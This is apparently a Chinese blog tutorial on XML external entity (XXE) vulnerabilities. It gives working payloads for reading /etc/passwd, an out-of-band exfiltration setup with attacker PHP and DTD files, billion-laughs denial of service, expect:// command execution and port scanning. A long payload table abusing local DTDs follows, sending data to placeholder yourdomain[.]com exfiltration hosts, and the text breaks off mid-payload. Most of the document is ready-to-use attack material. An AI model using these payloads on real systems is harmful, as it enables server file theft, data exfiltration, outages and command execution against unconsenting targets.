浅入深出了解XXE漏洞 (2)

日期：2021-05-08 栏目：程序人生浏览：次

该应用程序无需显式将响应返回给攻击者，因为它很容易受到信息泄露的影响。攻击者可以利用DNS信息通过子域名将数据泄漏到他们控制的DNS服务器

发现XXE漏洞

通过提交POST请求XML文件：
注意：提交一个POST请求，请求头加上Content-type:application/xml

第一步，验证XML解析器是否解析和执行我们自定义的XML内容

发送Payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY name "hacker">]> <root>&name;</root>

如果服务器返回成功解析xml文档
将放回内容为hacker

第二步：是否支持外部实体的引用
利用步骤：
1.自建web网站
2.在测试网站提交payload

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [<!ENTITY dtgmlf6ent SYSTEM "http://自己网站ip/文件名">]> <GeneralSearch>&test;</GeneralSearch>

查看网站返回内容中是否带有自建网站文件中的内容

查看自建服务器访问日志，是否有DTD文件等请求

XXE漏洞利用 1. 任意文件读取

payload （有回显）

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root><name>&xxe;</name></root>

通过外带（OOB）的方法来检测（无回显）

①自建web服务器

②创建接受数据的文件readdata.php

<?php file_put_contents("passwd.txt", $_GET['file']) ; ?>

③创建hacker.php来供外部实体引用

<?php $xml=<<<EOF <?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY % file SYSTEM "file:///etc/passwd"> //被攻击的服务器 <!ENTITY % remote SYSTEM "http://localhost/hacker.xml"> //自建服务器 %remote; %all; %send; ]> EOF; $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data) ; ?>

④创建hacker.xml

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/readdata.php?file=%file;'>">

当访问, 存在漏洞的服务器会读出/etc/passwd内容，发送给攻击者服务器上的hacker.php，然后把读取的数据保存到本地的passwd.txt中。

2. DOS攻击：

著名的“billion laughs”就是利用了XXE

payload

<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> 3.命令执行

php安装expect扩展可以直接执行系统命令，其他协议也有可能可以执行系统命令。

payload

<?xml version=”1.0″ encoding=”utf-8″?> <!DOCTYPE XXE <!ELEMENT name ANY > <!ENTITY XXE SYSTEM "expect://id" >]> <root> <name>&XXE;</name> </root> 4.端口扫描

端口开放时会返回报错信息，端口不存在时会无法连接

payload

<?xml version=”1.0″ encoding=”utf-8″?> <!DOCTYPE XXE [ <!ELEMENT name ANY > <!ENTITY XXE SYSTEM "http:/ip:port" >]> <root> <name>&XXE;</name </root> XXE爆破表 <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.yourdomain[.]com/"/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://xxe-xsi-nonamespaceschemalocation.yourdomain[.]com/"/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="http://xxe-xsinclude-schemalocation.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include namespace="http://xxe-xsinclude-namespace.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import schemaLocation="http://xxe-xsimport-schemalocation.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import namespace="http://xxe-xsimport-namespace.yourdomain[.]com/"/></xs:schema> <?xml-stylesheet href="http://xxe-xml-stylesheet.yourdomain[.]com/"?><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-1.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-2.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-3.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-4.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-5.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-6.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-7.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-8.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-9.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-10.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-11.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-12.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-13.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-14.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-15.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-16.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-17.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-18.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-19.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-20.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-21.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-22.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-23.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-24.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-25.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-26.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-1"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-2"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-3"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-4"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file "dns-exfil-5"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-6"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-7"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file "dns-exfil-8"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file "dns-exfil-9"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file "dns-exfil-10"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-11"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-12"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file "dns-exfil-13"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file "dns-exfil-14"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file "dns-exfil-15"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file "dns-exfil-16"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-17"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-18"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file "dns-exfil-19"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file "dns-exfil-20"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file "dns-exfil-21"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file "dns-exfil-22"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-23"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file "dns-exfil-24"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file "dns-exfil-25"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file "dns-exfil-26"> 